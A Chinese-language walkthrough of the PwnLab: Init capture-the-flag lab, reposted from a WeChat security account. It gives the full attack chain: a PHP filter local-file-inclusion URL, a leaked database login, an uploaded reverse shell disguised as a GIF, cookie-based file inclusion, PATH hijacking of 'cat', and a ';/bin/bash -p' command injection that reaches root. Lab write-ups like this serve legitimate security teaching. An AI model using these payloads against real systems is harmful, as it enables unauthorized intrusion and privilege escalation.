pwnlab_init详细教学

admin 2025年3月18日21:02:09评论6 views字数 1426阅读4分45秒阅读模式

pwnlab_init详细教学"愿走散的人再也不相逢,相逢的人再也走不散"

arp发现靶机ip地址pwnlab_init详细教学nmap扫出来很多信息pwnlab_init详细教学访问这几个页面有三个可选pwnlab_init详细教学这时发现这个地方可能有文件包含啊xdm',但是这里试了一下简单的目录穿越不给用pwnlab_init详细教学此时发现这个是个php写的,那可以利用一下php伪协议pwnlab_init详细教学

尝试读取一下源码http://192.168.52.253/?page=php://filter/read=convert.base64-encode/resource=login

pwnlab_init详细教学我们拿这个过去解码一下,发现有config文件pwnlab_init详细教学

那直接过去读confighttp://192.168.52.253/?page=php://filter/read=convert.base64-encode/resource=config

pwnlab_init详细教学解码出来就很相像数据库的密码username = "root";database = "Users";pwnlab_init详细教学这时候连一下数据库

要加这个--skip-ssl mysql -h 192.168.52.253 -uroot -p --skip-ssl

pwnlab_init详细教学连进数据库进行一波收集发现了用户名密码,但是可能需要解密pwnlab_init详细教学base64解码得到 kent/JWzXuBJJNy mike/SIfdsTEn6I kane/iSv5Ym2GRo 登录第一个用户名密码就可以进来pwnlab_init详细教学这里为了上传成功看一下上传的源码,看到只让上传图片形式的pwnlab_init详细教学我们首先新建一个php文件然后在开头加上GIF89a为了绕过检测,然后将kali里面自带的php反弹shell脚本贴近来,最后将文件名改为.jpg形式pwnlab_init详细教学然后上传我们的这个图片pwnlab_init详细教学通过dirb跑出来了upload路径应该就是我们上传的木马了pwnlab_init详细教学已经上传了,但是如何利用呢,通过分析index.php发现这下面有个lang,这行代码的作用是从服务器端包含一个指定的文件,具体文件路径由 $_COOKIE['lang']决定,所以应该带上cookie值就可以访问执行了

pwnlab_init详细教学来到这个上传页面抓个包pwnlab_init详细教学然后修改一下这个cookie值,同时本地开启监听pwnlab_init详细教学pwnlab_init详细教学先获取一个交互式终端pwnlab_init详细教学在home目录发现四个用户其中三个有账号但是只有mike进不去 来到这个kane发现有个这个msgmike,但是cat一下就乱马pwnlab_init详细教学通过strings查看发现cat命令pwnlab_init详细教学这里贴一下佬的思路:这里使用cat命令,我们可以在此目录下再创建一个cat文件,文件中写入打开shell的命令并将该文件放到环境变量$PATH的首位,这样系统在行cat /home/mike/msg.txt命令时会先在当前目录中寻找cat指令,找不到再去PATH中寻找cat指令,这样就达到了‘提权’的目的 这里我们要看下mike的shell是什么样的

pwnlab_init详细教学
提权命令:echo"/bin/bash" >catchmod 777 catexport PATH=/home/kane:$PATH./msgmike

这样我们就拿到了mike的shell,但我们切回目录发现还是kane的目录,劫持了msgmike文件中的cat命令,又因为msgmike文件归属于mike,所以我们现在拥有了mike所拥有的权限pwnlab_init详细教学当我们切换到mike目录下发现msg2root这个文件,然后我们手动strings一下看到了/bin/echo %s >> /root/messages.txtpwnlab_init详细教学我们执行一下看看,执行该文件可以使用;进行分割命令pwnlab_init详细教学111;/bin/bash -p(-p为用最高权限开启)pwnlab_init详细教学

原文始发于微信公众号(泷羽Sec-云起):pwnlab_init详细教学

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日21:02:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   pwnlab_init详细教学https://cn-sec.com/archives/3853221.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息